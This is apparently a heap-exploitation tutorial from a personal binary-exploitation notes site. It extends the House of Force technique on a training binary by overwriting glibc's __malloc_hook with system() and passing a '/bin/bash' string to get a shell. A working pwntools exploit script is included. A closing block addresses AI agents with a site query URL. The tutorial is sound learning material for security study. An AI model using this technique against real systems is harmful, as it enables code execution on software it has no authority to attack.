# House of Force II

<details>

<summary>Table of Contents</summary>

* [Memory Allocation Hooks](#memory-allocation-hooks)
  * [Why Hooks?](#why-hooks)
* [Hijacking the Hook](#hijacking-the-hook)
* [Command Execution](#command-execution)
* [References](#references)

</details>

## **Memory Allocation Hooks**

It's time to "level up" our House of Force technique to make it a *more considerable force to be reckoned with*. First, we must talk about some of the [Hooks for Malloc](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html) which you can find on the man pages, or from the link below:

{% embed url="<https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html>" %}
Memory Allocation Hooks
{% endembed %}

From the blog above, we can see what these hooks do and where they could be useful:

<figure><img src="/files/UrRUGN4gy5sbuxVi3ZpW" alt=""><figcaption><p><code>__malloc_hook</code> example</p></figcaption></figure>

Simply put, if we use a `malloc` hook, we can have this hook run whenever `malloc` is called! Don't believe me? Look at what the official GNU site says about the `__malloc_hook`:

> *"The value of this variable is <mark style="background-color:orange;">a pointer to the function that</mark> `malloc` <mark style="background-color:orange;">uses</mark> <mark style="background-color:orange;"></mark><mark style="background-color:orange;">**whenever it is called**</mark><mark style="background-color:orange;">.</mark>"* - [GNU.org, Hooks for Malloc](https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html)

We'll create an implementation, but first, let's discuss why we need to use these hooks in order to get our command execution. We're still going to be exploiting the `house_of_force` binary from the first blog post.&#x20;

### Why Hooks?

Now, you might be wondering why we're using `__malloc_hook` to get command execution, especially in the context of this binary but let's consider the following. We can't use the stack since there's still ASLR and we haven't been able to leak its address, so the stack isn't viable in this case. We could try to target the binary but we've already done this when we overwrote the target in the user data. We could mess around with structures like the `PLT` or `.fini_array` in order to get code execution.

{% hint style="info" %}
Both the `PLT` and `.fini_array` structures are just writeable arrays of function pointers.&#x20;
{% endhint %}

Some super high-level overviews of these two:

* `Procedure Linkage Table (PLT)`: Any function that the program calls that comes from an external library, like in this example, `GLIBC`, is represented in the `PLT`. This just dynamically resolves symbol names to the correct address. The reason why it remains writeable during the program's runtime is because of something called "[Lazy Linking](http://www.qnx.com/developers/docs/qnxcar2/index.jsp?topic=%2Fcom.qnx.doc.neutrino.prog%2Ftopic%2Fdevel_Lazy_binding.html)." Lazy linking/loading just makes it so that a function's address is only resolved when it's *first* called. Moreover, we could just overwrite the `printf` `PLT` entry with the address of the code that we'd like to execute so that the next time the binary tries to call `printf`, it'll be *our* code that ends up getting executed.
* `.fini_array`: This is just an array of function pointers that are to be run once a program exits. If we overwrite `.fini_array` slots, we could hijack the program's flow of execution and have it run whatever we want if we can get the program to exit.

Unfortunately for us, as great as these methods are, we can't use them either. If we recall the `checksec` output of the binary, we can see that it was compiled with `Full RELRO`:

<figure><img src="/files/wKd8wVlvS6yrcCoEMN31" alt=""><figcaption><p>Full RELRO</p></figcaption></figure>

This would make it unviable for us to use `PLT` or `.fini_array` because `Full RELRO` would make these two structures `read-only` after their initialization. Sh\*t so the stack *and* the binary are out of the equation. So what now? Well... what about the heap itself? Well, it would be a good idea except we don't really have anything on the heap aside from our own data; no function pointers, or any useful data on the heap. So the heap's out.  If we look at the program again we can see that we do have a `libc` leak from the `puts` function.

<figure><img src="/files/1EWS7gO7yzcKiYRx5fr7" alt=""><figcaption><p><code>libc</code> <code>puts()</code> leak</p></figcaption></figure>

So this looks promising, now it's just a matter of figuring out what in `libc` we can target to get command execution. Turns out `libc` has a `PLT` as well as two other structures called: `__exit_funcs` and `tls_dtors` which behave similarly to the `.fini_array`. So, we could target those but even though the `GLIBC PLT` is writeable throughout the lifetime of the program, triggering calls to the functions within it, is going to be pretty difficult. Furthermore, `__exit_funcs` and `tls_dtors` are protected by a thing called **Pointer Guard** which makes messing around with these structures pretty difficult as well. An awesome post on abusing exit handlers can be seen here:

{% embed url="<https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html>" %}
Abusing exit handlers, includes `__exit_func` & `tls_dtors`
{% endembed %}

> *"So what now?" x2*&#x20;

There actually is something we can use, that's also heap-specific as well! We can use the `malloc hooks`! Every one of the core `malloc` functions; such as `malloc`, `free`, `realloc`, etc. has its own associated hooks! They take the form of a writeable function pointer in `GLIBC`'s `.data` section. These are typically used by developers to do neat things like implement their own memory allocators or collect `malloc` statistics. For us, however, we're going to finally get some command execution with them.&#x20;

## Hijacking the Hook

To start, we're going to use the exploit script template and change a few lines of code, at the end I'll program my own variation of the exploit template given to us, but for right now, we need to just understand this because it *can* grow quite complex. Here's the code after making some alterations to the stock exploit template:

```python
#!/usr/bin/python3
from pwn import *

context.terminal = ['alacritty', '-e']
elf = context.binary = ELF("house_of_force", checksec=False)
libc = ELF(elf.runpath + b"/libc.so.6", checksec=False) # elf.libc broke again

gs = '''
continue
'''
def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# Select the "malloc" option; send size & data.
def malloc(size, data):
    io.send(b"1")
    io.sendafter(b"size: ", f"{size}".encode())
    io.sendafter(b"data: ", data)
    io.recvuntil(b"> ")

# Calculate the "wraparound" distance between two addresses.
def delta(x, y):
    return (0xffffffffffffffff - x) + y

io = start()

# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil(b"puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts

# This binary leaks the heap start address.
io.recvuntil(b"heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil(b"> ")
io.timeout = 0.1

# =============================================================================

malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, "Y")
# malloc(24, "crow was here")

# =============================================================================

io.interactive()
```

Here, we can see that the script remains the same aside from the barred section where we overwrite the `top_chunk` to hold a value of `0xffffffffffffffff`, and we get rid of the `delta` function we used before since that function won't be needed here as we're not going to be wrapping around the `VA` space anymore. We set the `distance` to be the difference between the `__malloc_hook` and the `top_chunk`. We do `__malloc_hook - 0x20` because we're trying to make the allocation stop *just before* the `malloc` hook. Then in the latter part, we do `heap + 0x20` to account for the `0x20` we already requested. We've also commented out the last `malloc` call because we're trying to see what this does to our program before we try to actually leverage this. So, let's run this script with the `GDB NOASLR` arguments:

<figure><img src="/files/xN5T9wNmxZtGofIdQw5X" alt=""><figcaption><p>Running script</p></figcaption></figure>

And now, inside of `gdb` we can tinker with this all we want. Let's start by breaking with `^C` and inspecting the memory around the `__malloc_hook`:

```c
pwndbg> dq &__malloc_hook-2
```

We're doing a `-2` instead of `-16` because `gdb` does pointer math depending on the type we pass it. So, let's see the output of this command:

<figure><img src="/files/BMNBIe660V8I3ONR3qwq" alt=""><figcaption><p>Output of <code>dq &#x26;__malloc_hook-2</code></p></figcaption></figure>

So, the highlighted `QWORD` is actually the `malloc` hook! Remember that we talked about this and how it's a *function pointer*. So, if we populate this `QWORD` with the address of a function, like `system`, it'll run this every time `malloc` is called! Another way you can find out where the `__malloc_hook` resides is by passing `&__malloc_hook` to `xinfo`:

<figure><img src="/files/OijRsM1u56K0EyVbNuci" alt=""><figcaption><p><code>&#x26;__malloc_hook: 0x7ffff7bafc10</code></p></figcaption></figure>

{% hint style="info" %}
When the `__malloc_hook` is `NULL` like this `QWORD` -> `0000000000000000`, then it doesn't do anything and `malloc` works normally. When it isn't `NULL` however, calls to `malloc` will subsequently be redirected to the address that the `__malloc_hook` holds. Your hacker senses should be tingling right about now.
{% endhint %}

Furthermore, if we run the `top_chunk` command, we can see the following output:

<figure><img src="/files/IXKRMXftE860GtXQ9ZrS" alt=""><figcaption><p><code>top_chunk</code> output</p></figcaption></figure>

This shows us that the `top_chunk` has been put right here, *right before* our `__malloc_hook`:

<figure><img src="/files/sNTzj5Q8IeHzaPMniSYe" alt=""><figcaption><p>Where the <code>top_chunk</code> has been placed</p></figcaption></figure>

This has been perfectly placed in a manner where we can now just overwrite the `__malloc_hook` with the next call we make to `malloc`! Let's give this a try with an address of something like `0xdeadbeef`.&#x20;

```python
...
malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, "Y")
malloc(24, p64(0xdeadbeef)) # uncommented this section and changed it to 0xdeadbeef
...
```

Now, let's run this script again with the `GDB NOASLR` arguments. If we now try to use option one (`1`) in the binary menu to allocate memory, we can see we're allowed to choose a size:

<figure><img src="/files/gkMLyMto6IdzK8BX9CpW" alt=""><figcaption><p>Choosing byte size for <code>malloc</code></p></figcaption></figure>

However, after pressing enter, the program hangs when in normal circumstances, it would ask us for the data we'd like to put into this allotted memory. This is happening because of the fact that we have overwritten the `__malloc_hook` with an address of `0xdeadbeef`. So, since that's not a valid address, it's obviously crashed on us. And surely, if we look at our `gdb` output:

<figure><img src="/files/G0zalgDeLCFxk78TtYzz" alt=""><figcaption><p><code>RIP = 0xdeadbeef</code></p></figcaption></figure>

<figure><img src="/files/ApVwM4FFNereJq9bPcee" alt=""><figcaption><p><code>__malloc_hook = 0xdeadbeef</code></p></figcaption></figure>

<figure><img src="/files/fK6pCzEWUqGB9zuo3jTB" alt=""><figcaption><p>Another way to see that <code>__malloc_hook = 0xdeadbeef</code></p></figcaption></figure>

The `__malloc_hook` made it so that whenever `malloc()` was called, it would instead run our code and as we can see by the fact that the binary crashed, and more importantly, by looking at the value in the `RIP` register, we can see that indeed, this was the case. So, now all we need to do is find a viable function for us to overwrite the `__malloc_hook` with so that we can get a shell! We can use a `libc` function like `system()`!&#x20;

## Command Execution

So, instead of `0xdeadbeef`, let's populate the `malloc()` call in our script to be `libc.sym.system`:

```python
...
malloc(24, b"Z" * 24 + p64(0xffffffffffffffff))
distance = (libc.sym.__malloc_hook - 0x20) - (heap + 0x20)
malloc(distance, "Y")
malloc(24, p64(libc.sym.system)) # &system() for our __malloc_hook
...
```

Now, every time there's a call to `malloc()`, it'll be redirected to `system()`. As many of you know, we need to set up the arguments for `system()` before we call it. In this case, we to pass a shell to `system()`, something like `/bin/bash` or `/bin/sh`, or whatever. From the man pages, we can see that `system()` is a very simple function, it just takes a single argument, which is just a pointer to a string that will be interpreted as a command.

<figure><img src="/files/E9dX9UYcAAjxDV2o9V1m" alt=""><figcaption><p><code>system()</code> man page entry</p></figcaption></figure>

But where the hell will we find the address of the string "`/bin/bash`" in memory? Well... Remember this part of our script?

```python
malloc(distance, "Y")
```

We could just replace the `Y` with our `/bin/bash`.

<figure><img src="/files/cP5RGzlTOryynU86WBGC" alt=""><figcaption><p>Setting up the shell string to be allocated to memory</p></figcaption></figure>

We make sure it's `null-terminated`. Furthermore, any arguments passed to `malloc()` will now also be passed to `system()`. So, we can use our string `/bin/bash` in place of the `size` portion of the `malloc()` request and it'll be passed to `system()` as an argument. Now, let's run this and find the offset of where this `/bin/bash` string is going to be.&#x20;

<figure><img src="/files/IlIo2NVuwtyCF0Xcu9q4" alt=""><figcaption><p>Offset of <code>/bin/bash</code> = <code>0x30</code></p></figcaption></figure>

From the output of the command above, we can see that the `/bin/bash` string lives really really early on in the heap memory. The heap starts at `0x603000` and the shell is at an offset of `0x30`, at `0x603030`. So, in our script, we can supply this offset as `heap + 0x30`:

<figure><img src="/files/5GRpF6kJ1BAplxPY6Os9" alt=""><figcaption><p>Putting <code>/bin/bash</code> offset to <code>malloc()</code> size argument</p></figcaption></figure>

Now, if we run this program, it should yield us a shell!

<figure><img src="/files/0XW8u6qjjdfmOUS5StiL" alt=""><figcaption><p>Shell recieved!</p></figcaption></figure>

Would you look at that? We got a shell! :smile::tada: I also made it a bit more logging-intensive just so see all the steps in action more:

<figure><img src="/files/xQ7lrkmOHczQyazqak0B" alt=""><figcaption><p>Final exploit output</p></figcaption></figure>

## References

{% embed url="<https://www.udemy.com/course/linux-heap-exploitation-part-1>" %}

{% embed url="<https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html>" %}

{% embed url="<https://man7.org/linux/man-pages/man3/malloc_hook.3.html>" %}

{% embed url="<http://www.qnx.com/developers/docs/qnxcar2/index.jsp?topic=/com.qnx.doc.neutrino.prog/topic/devel_Lazy_binding.html>" %}

{% embed url="<https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.crow.rip/nest/binexp/heap/house-of-force-i/house-of-force-ii.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
